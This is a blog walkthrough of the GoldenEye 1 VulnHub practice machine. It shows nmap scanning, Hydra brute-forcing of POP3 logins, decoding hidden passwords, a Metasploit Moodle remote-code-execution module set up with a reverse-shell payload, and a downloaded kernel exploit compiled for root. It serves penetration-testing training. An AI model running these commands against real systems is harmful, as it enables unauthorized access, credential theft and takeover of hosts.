GoldenEye: 1 VulnHub Walkthrough

Share on facebook
Share on twitter
Share on linkedin
Share on whatsapp

Hello Everyone, In this blog i am going to post walkthrough of GoldenEye 1. This machine is for them who have basic Knowledge and hand’s on experience with penetration Testing.

you can download the machine here.

Let’s Begin !!

Target IP –

Attacker IP –

So, Let’s start with scanning

nmap -sC -sV -Pn -p-

Ok!! we can see there are 4 ports open.

25- smtp

80- http

55006- ssl/pop3

55007- pop3

Now, Let’s check the website running on port 80.

It says to Navigate to /sev-home/.

Ok, We need to Login.

So, i tried few default usernames and passwords but it didn’t work.

I thought of checking page source.

Ok, There is terminal.js Let’s open it.

We can there is HTML encoded password and two usernames.



Let’s decode the password.


We got the password .

Let’s try to login on /sev-home/

Username – boris

Password – InvincibleHack3r

we logged in!!

I read the information written on the page.

the last sentence says POP3 is running on non-default port.

Even scan result says there is POP3 running on port 55007.

Let’s Bruteforce on POP3 with the usernames boris and natalya using the tool Hydra.

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f -s 55007 pop3

hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f -s 55007 pop3

We found passwords.

boris – secret1!

natalya – bird

Now, Let’s connect to pop3 using the credentials by nc.

nc 55007

USER boris

PASS secret1!


There are 3 Messages Let’s see,


It’s a message from admin to boris.


It’s a message from natalya to boris, that natalya can break boris codes.


In 3rd message we can see access codes are kept in root directory. So, we can’t access from here.

Let’s move to natalya

nc 55007

USER natalya

PASS bird


There are 2 mesages, Let’s see


It’s a message to natalya, that she has to stop breaking boris codes.


Ok! we got some information here,

username: xenia

password: RCP90rulez!


Before opening the domain we have to point server IP to in /etc/hosts

echo >> /etc/hosts

To check,

cat /etc/hosts

Let’s check in the browser

Now, Let’s login with the credentials we got in natalya mail.

username: xenia

password: RCP90rulez!

After logging in, I was exploring and found another user chat in messages.

if we read it it says,

My email username is “doak”.

Let’s bruteforce again with doak as the username on pop3 using hydra.

hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f -s 55007 pop3

Ok! we got the password “goat“.

Now, let’s connect to pop3 using nc.

nc 5500

USER doak

PASS goat



So, we got the login credentials of doak.

username: dr_doak

password: 4England!

Let’s login,

We logged in as dr_doak.

I was checking every module to find any clue then there is module My private files there i found a text file “s3cret.txt

I downloaded the file and checked if we can find anything,

So, it says something is located in /dir007key/for-007.jpg

So, i opened above URL in browser

It’s an image. So i downloaded it and checked,


strings for–007.jpg

Ok! we can see something encoded string, It’s a base64 encoded string


Let’ decode,

We got plain text string and we know it is admin’s password.

username: admin

password: xWinter1995x!

Let’s login,

We logged in as ADMIN.

Now, we should get shell on our terminal.

I searched if we can upload a file to get the revere shell but didn’t find any.

After exploring, i found the the website name as “MOODLE” and found it’s version.

I checked if there is any exploit for Moodle 2.2.3 and i found there is Remote Code Execution vulnerability .

So, i started Metasploit Framework.


use exploit/multi/http/moodle_cmd_exce

show options

set password xWinter1995x!

set rhost

set targeturi /gnocertdir

set username admin

set payload cmd/unix/reverse

set lhost

set lport 4444


we got the shell.

Now we have to get root access,

uname -a

So, i got the version details.

I checked for the exploit and found 1.

Let’s download it,

and let’s edit the code

By default it is gcc change it to cc as gcc isn’t working on shell we got.

Save it and start python http server.

python -m SimpleHTTPServer 8080

Now, let’s get the file into the shell we got,


cc exploit.c -o priv



Here, I got the ROOT access.

Writer: Anudeep is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.

Share on facebook
Share on twitter
Share on linkedin
Share on whatsapp

Leave a Comment

Your email address will not be published.

Scroll to Top